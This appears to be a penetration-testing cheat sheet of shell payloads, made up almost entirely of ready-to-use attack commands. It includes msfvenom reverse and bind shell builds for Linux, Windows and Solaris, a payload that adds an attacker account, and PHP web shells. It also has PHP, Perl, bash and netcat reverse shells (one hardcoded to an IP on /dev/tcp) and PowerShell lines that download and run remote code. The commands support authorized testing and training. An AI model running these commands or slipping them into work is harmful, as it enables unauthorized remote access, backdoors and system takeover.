Shells
Last updated
Last updated
Locate and upload the appropriate shell from - /usr/share/webshellsnc -nlvp 80
nc -nlvp 443
nc -nlvp 3000
nc -nlvp 4444
nc -nlvp 8080shell/reverse_tcp = staged payload
shell_reverse_tcp = unstaged payload
Note that staged payload requires a meterpreter listener to send the second stage of the payload
32-bit Systems -
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<port> -f elf > shell-x86.elf
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f elf > shell-x86.elf
64-bit Systems -
msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<port> -f elf > shell-x64.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f elf > shell-x64.elf32-bit Systems -
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<IP> LPORT=<port> -f elf > bind.elf
msfvenom -p linux/x86/shell/bind_tcp RHOST=<IP> LPORT=<port> -f elf > bind.elf
msfvenom -p linux/x86/shell_bind_tcp RHOST=<IP> LPORT=<port> -f elf > bind.elf
64-bit Systems -
msfvenom -p linux/x64/meterpreter/bind_tcp RHOST=<IP> LPORT=<port> -f elf > bind.elf
msfvenom -p linux/x64/shell/bind_tcp RHOST=<IP> LPORT=<port> -f elf > bind.elf
msfvenom -p linux/x64/shell_bind_tcp RHOST=<IP> LPORT=<port> -f elf > bind.elfmsfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf32-bit Systems -
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<port> -f exe > shell-x86.exe
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f exe > shell-x86.exe
64-bit Systems -
msfvenom -p windows/x64/shell/reverse_tcp LHOST=<IP> LPORT=<port> -f exe > shell-x64.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f exe > shell-x64.exe32-bit Systems -
msfvenom -p windows/meterpreter/bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
msfvenom -p windows/meterpreter_bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
msfvenom -p windows/shell/bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
msfvenom -p windows/shell_bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
64-bit Systems -
msfvenom -p windows/x64/meterpreter/bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
msfvenom -p windows/x64/meterpreter_bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
msfvenom -p windows/x64/shell/bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
msfvenom -p windows/x64/shell_bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exemsfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exemsfvenom -a [ x86 | x64 ] --platform Windows -p windows/exec CMD="<powershell | cmd command>" -f exe > payload.exe
Examples -
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://<IP>/<payload>')\"" -f exe > payload.exe
msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators <username> /add" -f exe > payload.exemsfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exeLaunch msfconsole - sudo msfconsole
Run the following -
use exploit/multi/handler
set PAYLOAD <payload>
set LHOST <attacker IP>
set LPORT <attacker listening port>
runWeb Shells -
<?php system($_GET['cmd']); ?>
<?php system($_REQUEST["cmd"]); ?>
Reverse Shells -
<?php system('nc.exe -e cmd.exe <attacker IP> <port>') ?>
msfvenom -p php/meterpreter_reverse_tcp LHOST=<attacker IP> LPORT=<port> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
php -r '$sock=fsockopen("<attacker IP>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'
Web Shells -
/usr/share/webshells/aspx/cmdasp.aspx
/usr/share/webshells/aspx/shell.aspx
# Modify shell.aspx variables, string host, and int port
Reverse Shells -
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<port> -f asp > reverse.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<port> -f aspx > reverse.aspxmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker IP> LPORT=<port> -f raw> reverse.jspmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker IP> LPORT=<port> -f war > reverse.warsfvenom -p nodejs/shell_reverse_tcp LHOST=<attacker IP> LPORT=<port>evil-winrm -i <ip> -u <username> -p <password>
evil-winrm -i <ip> -u <username> -H <NTLM hash>
# Verify usability with: crackmapexec winrm <ip>
# Look for port 5985 in nmap scans
> Use the download command to download files while in a evil-winrm session
# download /relative/file/path/<filename>
> Use the upload command to download files while in a evil-winrm session
# upload /relative/file/path/<filename>Download payload:
powershell -nop -w hidden IEX(New-Object System.Net.WebClient).DownloadString('http://<IP>/powercat.ps1')
Initiate reverse shell:
powercat -c <IP> -p <Port> -e powershellmsfvenom -p cmd/unix/reverse_perl LHOST=(<IP>) LPORT=(<port>) -f raw > reverse.plmsfvenom -p cmd/unix/reverse_python LHOST=(<IP>) LPORT=(<port>) -f raw > reverse.py
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<Kali IP>:<Kali port>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'Web Shells -
<?php system($_GET['cmd']); ?>
<?php system($_REQUEST["cmd"]); ?>
Reverse Shells -
<?php system('nc.exe -e cmd.exe <attacker IP> <port>') ?>
php -r '$sock=fsockopen("<attacker IP>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'Create a .sh file and write the following
#!/bin/bash
/bin/bash -c "bash -i >& /dev/tcp/192.168.45.200/9090 0>&1"nc -nv <IP> <port> -e /bin/bash
nc -nv <IP> <port> -e /bin/sh
nc -nv <IP> <port> -c /bin/bash
nc -nv <IP> <port> -c /bin/sh
nc64.exe <IP> <port> -e cmd
nc64.exe <IP> <port> -e powershell
nc64.exe <IP> <port> -t -e cmd
nc64.exe <IP> <port> -t -e powershell